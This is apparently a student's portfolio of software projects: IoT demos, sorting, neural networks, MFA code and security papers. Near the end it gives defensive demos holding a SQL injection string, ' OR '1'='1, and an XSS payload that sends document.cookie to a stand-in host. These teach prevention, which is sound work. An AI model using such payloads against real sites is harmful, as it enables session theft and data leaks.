In this project, my team and I worked on a way to summarize websites for the user. We started with one idea, but after researching and developing it for a while we decided it was too complex to achieve in the given timeframe, so we opted for a simpler approach.
For my SIP I experimented with many different engines before deciding on Flutter for my user interface. I needed an engine I could learn quickly and use to develop an MVP rapidly.
https://github.com/Koratun/metacognition_artificial_intelligence
My first thoughts went to game development. Engines such as Unity and Unreal are backed by many online tutorials built specifically so that a budding game developer can learn new skills! An additional plus was that I had worked in Unity before in high school, so I tried it first.
One of the primary features I needed for this app was communication with a Python script. I searched and searched, but I could not find an easy way to do that from C#. I was also more familiar with C++ than C#, so I decided to try a different engine.
Unreal Engine seemed a better candidate because it uses C++ and has a neat blueprinting system for its components that I knew would be useful.
I got further into prototyping a simple UI, but I quickly found that the engine offered far too much of what I did not need for my project. I needed a simple 2D interface, not all the bells and whistles that come with a full 3D game.
Enter Flutter. Flutter seemed to be exactly what I needed! It is a relatively new framework designed specifically to help developers push out an MVP quickly. While it is aimed primarily at mobile, it also has strong support for web and desktop platforms, which made it easier to deliver a feature I eventually wanted my SIP to have: availability on multiple platforms.
For this project, I used Python and the PyCharm IDE.
For this project, I used C++ and the Visual Studio IDE.
I helped create an API that is hosted in a Linux Docker container running Python 3.9.7.
For security reasons, I cannot give the GitHub link to this repository. This has been approved by UAT (per Jill Coddington).
I created an admin dashboard for my workplace so that we can easily view and change values in our database from anywhere in the world without needing direct access to it. For example, if someone creates a post with bad content (such as a link to malware or pornographic content), we can instantly mark it as disapproved, and the front-end app will hide its contents from our users.
For security reasons, I cannot give the GitHub link to this repository. This has been approved by UAT (per Jill Coddington).
Here I demonstrate the M5StickCPlus recording its acceleration data and sending the largest value it has recorded to the ThingSpeak API to be recorded on my graph.
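The device code runs in C on the M5StickCPlus, but the ThingSpeak call itself is just an HTTP request with a write API key and field values as query parameters. A Python sketch of building that request (the key below is a placeholder, and the acceleration value is made up) might look like:

```python
from urllib.parse import urlencode

# Placeholder write key and a made-up peak reading; the real sketch runs in C
# on the M5StickCPlus with a real ThingSpeak channel write key.
THINGSPEAK_WRITE_KEY = "XXXXXXXXXXXXXXXX"
peak_acceleration = 2.37  # largest acceleration magnitude recorded this interval

params = urlencode({"api_key": THINGSPEAK_WRITE_KEY, "field1": peak_acceleration})
url = f"https://api.thingspeak.com/update?{params}"
print(url)
# An HTTP GET or POST to this URL appends the value to the channel's field1,
# which is what the graph plots.
```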
Here I demonstrate how to activate an applet trigger on IFTTT with the press of a button on the M5StickCPlus. This then sent an email to my student email account as shown below.
I plan out sprints with my SIP using Trello. While planning the next sprint I create cards (or tickets) and place them into sprint planning. When a new sprint begins, I place the tasks that I want to complete for that sprint into the To Do column. Completed cards are archived so that they can be referenced in the future should the need arise. Each card comes packed with all the information necessary for the feature it describes.
https://trello.com/b/v5lPOZBl/mai-milestone-4-%F0%9F%94%A5-07-08-2022-07-28-2022
While I do not manage the entire sprint board for my workplace, I sometimes create my own tickets, and I always manage them and write in the necessary information. For example, when I complete work on a ticket, I document the changes I made and provide a checklist for the QA team so they know how to test what I have done.
For security reasons, I cannot give the link to this Jira board. This has been approved by UAT (per Jill Coddington).
In this program, I demonstrate the differences in efficiency between some common sorting algorithms: bubble, insertion, and merge sort. The comparison uses an array filled with 10,000 random integers.
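A comparable benchmark can be sketched in Python (a smaller 2,000-element array is used here so the quadratic sorts finish quickly; the original program used 10,000):

```python
import random
import time

def bubble_sort(a):
    """O(n^2): repeatedly swap adjacent out-of-order pairs."""
    a = a[:]
    n = len(a)
    for i in range(n):
        swapped = False
        for j in range(n - 1 - i):
            if a[j] > a[j + 1]:
                a[j], a[j + 1] = a[j + 1], a[j]
                swapped = True
        if not swapped:
            break
    return a

def insertion_sort(a):
    """O(n^2): grow a sorted prefix by inserting each element into place."""
    a = a[:]
    for i in range(1, len(a)):
        key, j = a[i], i - 1
        while j >= 0 and a[j] > key:
            a[j + 1] = a[j]
            j -= 1
        a[j + 1] = key
    return a

def merge_sort(a):
    """O(n log n): split in half, sort each half, merge the results."""
    if len(a) <= 1:
        return a
    mid = len(a) // 2
    left, right = merge_sort(a[:mid]), merge_sort(a[mid:])
    out, i, j = [], 0, 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            out.append(left[i]); i += 1
        else:
            out.append(right[j]); j += 1
    return out + left[i:] + right[j:]

data = [random.randrange(100_000) for _ in range(2_000)]
for sorter in (bubble_sort, insertion_sort, merge_sort):
    start = time.perf_counter()
    sorter(data)
    print(f"{sorter.__name__}: {time.perf_counter() - start:.3f}s")
```

On arrays this size, merge sort typically finishes orders of magnitude faster than the two quadratic sorts, which is the gap the program demonstrates.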
The magic behind the sudoku solver in this program is a sparsely populated matrix of linked nodes, a linked-list matrix if you will.
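A minimal sketch of such a node, reminiscent of the structure used in Knuth's Dancing Links, where each cell links only to its nearest occupied neighbors (the class and helper names here are illustrative, not the solver's actual code):

```python
class Node:
    """A cell in a sparse matrix; links point to the nearest occupied neighbors."""
    def __init__(self, row, col):
        self.row, self.col = row, col
        # Each node starts circularly linked to itself in both axes.
        self.left = self.right = self.up = self.down = self

def link_row(nodes):
    """Circularly link a list of nodes left-to-right."""
    for a, b in zip(nodes, nodes[1:] + nodes[:1]):
        a.right, b.left = b, a

def row_columns(node):
    """Collect column indices by walking right until we loop back to the start."""
    cols, cur = [node.col], node.right
    while cur is not node:
        cols.append(cur.col)
        cur = cur.right
    return cols

# A sparse row whose only nonzero entries sit in columns 0, 3, and 7:
cells = [Node(0, c) for c in (0, 3, 7)]
link_row(cells)
print(row_columns(cells[0]))  # [0, 3, 7]
```

Because empty cells are never stored, walking a row or column visits only the populated entries, which is what makes the sparse representation fast for constraint searches like sudoku.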
This project was two-fold. I wanted to take a series of images captured during drone movement and feed them into an AI that would predict how far the drone had moved between two consecutive images. First, I created a simulated drone in Unity that flew around randomly and took pictures as it moved. Then I fed those images into my AI, which used deep learning to learn the distances the drone had moved. It uses a couple of convolutional layers in a submodel that analyzes both images, then combines the two images' data and tries to learn which differences between the images correspond to which movement in which direction.
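The real model uses deep-learning convolutional layers; as a library-free sketch of just the two-branch idea (one shared encoder applied to both frames, outputs concatenated into a regression head), here is the data flow in plain NumPy with random, untrained weights. All names and sizes are illustrative:

```python
import numpy as np

rng = np.random.default_rng(0)

def shared_features(img, w):
    """Stand-in for the convolutional submodel: flatten and project the image.
    Both frames pass through the SAME weights, so they are encoded identically."""
    return np.tanh(img.reshape(-1) @ w)

def predict_motion(img_a, img_b, w_feat, w_head):
    """Encode each frame with the shared submodel, concatenate the features,
    and regress a 3-D displacement (dx, dy, dz) from the combined vector."""
    combined = np.concatenate([shared_features(img_a, w_feat),
                               shared_features(img_b, w_feat)])
    return combined @ w_head

H, W, FEAT = 32, 32, 16
w_feat = rng.normal(size=(H * W, FEAT)) * 0.1   # shared encoder weights
w_head = rng.normal(size=(2 * FEAT, 3)) * 0.1   # regression head weights

frame1 = rng.random((H, W))                     # two consecutive greyscale frames
frame2 = rng.random((H, W))
print(predict_motion(frame1, frame2, w_feat, w_head).shape)  # (3,)
```

Sharing the encoder weights across both frames is the key design choice: the network learns one way to describe an image, and the head learns how differences between two such descriptions map to motion.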
This AI could then be loaded into a server that communicates with a drone: as the drone feeds the server what it sees, the server tells the drone its position relative to where it booted up.
https://github.com/Koratun/Deep-Sight - AI Code
https://github.com/Koratun/Drone-Simulator - Simulator Code
After just a few epochs you can see on the left how quickly the loss descends to around 0.98. On the right, you can see an example of the data that was fed into the AI.
In this project, I used an M5Stick to gather microphone data. It would then encode that data as hex and send it to the server.
This is the Python code that ran on the server, passing the microphone data to a Shazam library to find a musical match.
This is the C code that ran on the M5 to capture, encode, and send audio data to the server.
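The device side is C, but the encode/decode round trip is easy to sketch in Python. The sample values and the little-endian 16-bit layout below are assumptions about the payload format, not the project's actual wire protocol:

```python
import binascii
import struct

samples = [0, 1024, -1024, 32767, -32768]          # fake microphone readings
raw = struct.pack(f"<{len(samples)}h", *samples)   # pack as little-endian int16
payload = binascii.hexlify(raw).decode("ascii")    # hex text the device would send
print(payload)

# Server side: reverse the hex encoding and unpack the samples.
decoded = list(struct.unpack(f"<{len(payload) // 4}h",
                             binascii.unhexlify(payload)))
print(decoded == samples)  # True
```

Note that hex encoding doubles the byte count (each int16 becomes four hex characters); its benefit is that the payload is plain printable text, which is simple to transmit and debug.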
This program uses natural language processing libraries to search the internet for answers to questions you ask it. It also reads its five-sentence response aloud. And it cites its sources!
https://github.com/Koratun/nlp_demos/tree/master/researcher
For example, I asked, "What is the leading cause of global warming?" And it responded with the following:
I coded a simple AI that uses gradients and matrices to learn to identify handwritten numbers. It uses a single dense layer of 200 hidden nodes to analyze a 28x28 greyscale image, with a learning rate of 0.08 over 40 epochs. This allowed it to descend the loss curve quickly until it began to stabilize around a loss of 0.5 and an accuracy of 89%.
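The mechanics can be sketched in NumPy. To stay self-contained, this toy trains on synthetic two-class data with a smaller hidden layer instead of the real MNIST digits, but the forward pass, hand-derived gradients, 40 epochs, and 0.08 learning rate mirror the description above:

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic stand-in for MNIST: two classes of 28x28 "images" drawn from
# Gaussian blobs with shifted means. (The real project used handwritten digits
# with 10 classes and 200 hidden nodes.)
N, D, H, C = 200, 28 * 28, 20, 2
X = rng.normal(size=(N, D)) + np.where(np.arange(N)[:, None] < N // 2, 0.3, -0.3)
labels = (np.arange(N) >= N // 2).astype(int)
Y = np.eye(C)[labels]                          # one-hot targets

W1 = rng.normal(size=(D, H)) * 0.01; b1 = np.zeros(H)
W2 = rng.normal(size=(H, C)) * 0.01; b2 = np.zeros(C)
lr = 0.08                                      # same learning rate as the project

def softmax(z):
    e = np.exp(z - z.max(axis=1, keepdims=True))
    return e / e.sum(axis=1, keepdims=True)

losses = []
for epoch in range(40):
    a1 = np.tanh(X @ W1 + b1)                  # hidden activations
    p = softmax(a1 @ W2 + b2)                  # class probabilities
    losses.append(-np.mean(np.sum(Y * np.log(p + 1e-12), axis=1)))

    dz2 = (p - Y) / N                          # gradient of loss w.r.t. logits
    dW2, db2 = a1.T @ dz2, dz2.sum(0)
    dz1 = (dz2 @ W2.T) * (1 - a1 ** 2)         # backprop through tanh
    dW1, db1 = X.T @ dz1, dz1.sum(0)
    W1 -= lr * dW1; b1 -= lr * db1             # gradient descent step
    W2 -= lr * dW2; b2 -= lr * db2

accuracy = np.mean(p.argmax(axis=1) == labels)
print(f"final loss {losses[-1]:.3f}, accuracy {accuracy:.2f}")
```

The loss falls as the weight matrices align with the class structure, the same descent behavior the project's loss curve shows.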
This project was a bit ambitious for my computer. I decided to make a Generative Adversarial Network using the CIFAR10 dataset as the input data. A GAN is designed with two inner AIs that compete against each other: the Discriminator's job is to determine whether the image it is seeing is real or generated, and the Generator's job is to produce images that fool the Discriminator. Over time the two improve each other, as the Discriminator learns what makes an image look real and the Generator learns what to create to imitate a real image.
After the long process of learning how to do all of this, I finally had a working model! So I started training it with my NVIDIA 2060 Super, a GPU that lets the AI learn far faster than the CPU alone. However, even with this moderately advanced GPU, the model proved too complex to train at any reasonable speed. I ran the training for two straight days, and it had barely begun learning how to make differently shaped color blobs, as depicted below.
https://github.com/Koratun/metacognition_artificial_intelligence/tree/master/playground_ai - Specifically the generative_adversarial_network.py and gan_display.py files
As described above, this model takes two images captured right after each other and compares them to determine the distance traveled between the two.
This model handles analyzing each individual image.
This model handles analyzing the differences between two images in the sequence.
For the generator portion of my CIFAR10 Generative Adversarial Network, I fed randomly generated noise through a series of dense layers followed by 2D convolutional transpose layers (essentially the inverse operation of a normal convolutional layer) to produce an image.
For the Discriminator, I used essentially the opposite: some convolutional layers followed by dense layers to produce a binary response of real or fake.
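The "inverse operation" point comes down to output-size arithmetic: a strided convolution shrinks the spatial dimensions, and a transposed convolution with the same parameters grows them back. A small sketch (the 4x4 seed, kernel size 4, stride 2, and padding 1 are illustrative choices for reaching CIFAR10's 32x32, not necessarily my model's exact settings):

```python
def conv_out(n, k, s, p=0):
    """Spatial size after a normal convolution with kernel k, stride s, padding p."""
    return (n + 2 * p - k) // s + 1

def conv_transpose_out(n, k, s, p=0):
    """Spatial size after a transposed convolution: the inverse size mapping."""
    return s * (n - 1) + k - 2 * p

# Generator path: a 4x4 seed upsampled by stride-2 transposed convs to 32x32.
size = 4
for _ in range(3):
    size = conv_transpose_out(size, k=4, s=2, p=1)
    print(size)  # 8, then 16, then 32

# The Discriminator runs the same arithmetic in reverse, halving each time.
print(conv_out(32, k=4, s=2, p=1))  # 16
```

Composing the two with matching parameters returns the original size, which is why the Generator and Discriminator architectures mirror each other.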
https://github.com/Koratun/metacognition_artificial_intelligence/tree/master/playground_ai - Specifically the generative_adversarial_network.py and gan_display.py files
In this project, I used Python in VSCode to make a simple to-do list targeting the Windows platform.
Here I show how I developed my IFTTT Demo in C in the Arduino IDE targeting the M5StickCPlus.
This is the Drone Simulator I used to create the data to feed my Drone Sight AI. I used the Unity game engine, which uses C#, along with Visual Studio. I also used Sourcetree as my VCS for this project.
Firebase provides a cloud-hosted database, and to demonstrate how one can use it, I created a simple program that can be controlled via Firebase. When a specific row is set to ON, the main light switches on, and when it is set to OFF, the light switches off. Simply by changing a value in the database, I can effect changes on a device that could be anywhere in the world (with an Internet connection).
At my workplace, we use PostgreSQL as our database management system: essentially standard SQL with extra functionality here and there. At Involio we have many different objects with complex relationships to each other (posts, users, files, comments, likes, etc.), and a relational database makes these much easier to work with. I have also written many queries, both with SQLAlchemy (a Python library) and in raw SQL.
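The flavor of those relationships can be sketched with the stdlib's sqlite3 module (the production system is PostgreSQL, and this schema is illustrative, not Involio's actual tables). It also ties back to the moderation example from the admin dashboard: disapproving a post hides it from queries.

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE posts (id INTEGER PRIMARY KEY,
                        user_id INTEGER REFERENCES users(id),
                        body TEXT, approved INTEGER DEFAULT 1);
    CREATE TABLE likes (user_id INTEGER REFERENCES users(id),
                        post_id INTEGER REFERENCES posts(id));
""")
db.execute("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')")
db.execute("INSERT INTO posts (id, user_id, body) VALUES (1, 1, 'hello'), (2, 2, 'spam')")
db.execute("INSERT INTO likes VALUES (2, 1), (1, 1)")
db.execute("UPDATE posts SET approved = 0 WHERE id = 2")  # moderator disapproves

# Relational query: visible posts with their author and like count.
rows = db.execute("""
    SELECT p.body, u.name, COUNT(l.post_id) AS likes
    FROM posts p
    JOIN users u ON u.id = p.user_id
    LEFT JOIN likes l ON l.post_id = p.id
    WHERE p.approved = 1
    GROUP BY p.id
""").fetchall()
print(rows)  # [('hello', 'alice', 2)]
```

A single join query answers a question that spans three object types, which is the advantage a relational database gives over storing these objects separately.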
For security reasons, I cannot give the GitHub link nor the AWS link to this database instance. This has been approved by UAT (per Jill Coddington).
Here I create a network diagram for Real Fake Industries. They have two sites that are connected via a VPN using an IPsec Tunnel. Each workgroup (sales, management, the call center, etc.) is separated onto its own VLAN so that atypical traffic for each group can be more easily identified. The IT group in Phoenix contains backup DNS and ADDC. It also contains its own IDS to monitor the traffic within the Phoenix network. The IDS in San Diego monitors all traffic within the corporation.
My workplace has an admin dashboard that can access, update, and delete any data in our database from anywhere with an Internet connection. Previously, the dashboard was protected only by a password. But I changed that: I leveraged Twilio's MFA service and made MFA required for any admin accessing the dashboard, further securing it from prying eyes.
In this paper, I detail how to harden a Windows 10 system with screenshots.
Below and to the right is some of the Python code I wrote to authenticate a user based on their username, password, and the OTP sent to them via Twilio.
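In the real system, Twilio generates and delivers the one-time codes, so the actual code calls their API. As a self-contained stand-in, this sketch uses an RFC 4226/6238-style HMAC one-time password to show the shape of the two-factor check. The user table, hashing scheme, and function names are all hypothetical, and a production system would use a proper password KDF (bcrypt, scrypt, argon2) rather than plain SHA-256:

```python
import hashlib
import hmac
import secrets
import struct
import time

def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                      # dynamic truncation offset
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(key: bytes, step: int = 30) -> str:
    """Time-based OTP: HOTP over the current 30-second window."""
    return hotp(key, int(time.time()) // step)

def authenticate(username, password, otp, users, key):
    """First factor (password hash), then second factor (OTP), both compared
    with constant-time equality to avoid timing side channels."""
    record = users.get(username)
    if record is None or not hmac.compare_digest(
            record["password_hash"],
            hashlib.sha256(password.encode()).hexdigest()):
        return False
    return hmac.compare_digest(otp, totp(key))

key = secrets.token_bytes(20)                    # per-user shared OTP secret
users = {"admin": {"password_hash": hashlib.sha256(b"hunter2").hexdigest()}}
print(authenticate("admin", "hunter2", totp(key), users, key))  # True
print(authenticate("admin", "hunter2", "000000", users, key))   # almost surely False
```

The key property is that both factors must pass: a stolen password alone fails the OTP check, and a guessed OTP alone fails the password check.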
This presentation briefly covers several aspects of the Business Continuity and Disaster Recovery Plan that I created with a team of three other students.
This paper goes in-depth on how to train employees to be more aware of email phishing attacks and to practice better personal and physical security.
This report details the Omnibus Rule put into effect by the Department of Health and Human Services in 2013. It modifies both HIPAA and HITECH, which govern the electronic storage of patients' health information and other PII.
This implementation plan details how Real Fake Industries will safeguard its new data center with physical and digital security, along with brief incident response and future-proofing plans. These safeguards will allow RFI to follow best practices when collecting, storing, and transmitting user data.
In this paper, I dive into common forms of SQL injection, how they are executed, and how they can be prevented.
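A minimal sqlite3 demonstration of the classic `' OR '1'='1` injection and the standard fix, parameterized queries (the table and data here are illustrative):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, secret TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 's3cret'), ('bob', 'hunter2')")

malicious = "nobody' OR '1'='1"

# Vulnerable: string concatenation lets the input rewrite the WHERE clause,
# so the query becomes ... WHERE name = 'nobody' OR '1'='1' and matches everything.
leaked = db.execute(
    "SELECT * FROM users WHERE name = '" + malicious + "'").fetchall()
print(len(leaked))  # 2 -- every row leaked

# Safe: a parameterized query treats the whole input as one literal value.
safe = db.execute("SELECT * FROM users WHERE name = ?", (malicious,)).fetchall()
print(len(safe))    # 0 -- no user is literally named "nobody' OR '1'='1"
```

The prevention rule is that query structure and user data must never be mixed in one string; placeholders keep the data out of the SQL parser entirely.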
In this paper, I discuss what cross-site scripting is and how it can be used to phish people's PII. I also discuss what websites need to do to prevent this kind of abuse.
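The core server-side defense, output encoding, can be sketched with the Python stdlib (the attacker payload and page fragment are illustrative):

```python
import html

# Attacker-supplied comment that would run script if echoed raw into a page.
comment = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'

unsafe_page = "<p>" + comment + "</p>"             # vulnerable: markup preserved
safe_page = "<p>" + html.escape(comment) + "</p>"  # encoded: rendered as inert text

print("<script>" in unsafe_page)  # True  -- browser would execute it
print("<script>" in safe_page)    # False -- angle brackets became &lt; and &gt;
```

Escaping on output (plus a Content-Security-Policy and context-aware encoding for attributes and URLs) is what keeps untrusted input from ever being interpreted as markup.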